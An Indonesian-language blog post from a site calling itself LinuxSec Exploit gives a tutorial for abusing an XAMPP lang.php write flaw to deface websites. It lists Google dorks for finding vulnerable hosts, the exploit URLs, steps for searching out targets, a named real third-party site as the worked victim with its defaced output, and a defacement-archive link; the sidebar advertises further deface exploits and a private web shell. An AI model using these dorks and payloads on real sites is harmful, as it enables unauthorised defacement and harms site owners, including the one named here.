• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

XAMPP All Version Local Write Access Vulnerability

October 16, 2013 by Jack Wilder 1 Comment

Kali ini saya akan share salah satu exploit yang mungkin tergolong mudah untuk dipraktekkan. XAMPP All Version Local Write Access Vulnerability. Oke langsung saja ya. Ini exploit lagi rame sekarang 😀
Google Dork :
inurl:/xampp/lang.php
inurl:/security/lang.php
Use your brain :p

Exploit :
http://localhost/[path]/xampp/lang.php?WriteIntoLocalDisk
http://localhost/[path]/security/lang.php?WriteIntoLocalDisk

Langkah langkah :
Mulai berselancardi google dan cari target .
Contoh : http://www.aquadivarigotti.it/security/lang.php
Tinggal masukkan exploitnya, contohnya menajdi http://www.aquadivarigotti.it/security/lang.php?hacked_by_Nabilaholic404

Hasilnya terletak di http://localhost/[path]/xampp/lang.tmp atau http://localhost/[path]/security/lang.tmp

Contoh
http://www.aquadivarigotti.it/security/lang.tmp

Mirror

http://www.zone-h.org/mirror/id/20996159

Sekian tutorial kali ini, semoga bermanfaat 🙂

Shares

Filed Under: Uncategorized Tagged With: Exploit

Reader Interactions

Comments

  1. cak oni says

    October 18, 2013 at 5:38 am

    bermanfaat nih kang buat saya yang pemula

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Shopify Custom Domain or Subdomain Takeover

WordPress Plugin CopySafe PDF Protection Shell Upload

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Laravel PHPUnit Remote Code Execution

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Download 1n73ct10n / 1n73ction Privat Web Shell by X’1N73CT

Tumblr Custom Domain or Subdomain Takeover

Azure Traffic Manager Custom Domain or Subdomain Takeover

LinuxSec / 65 queries in 0.09 seconds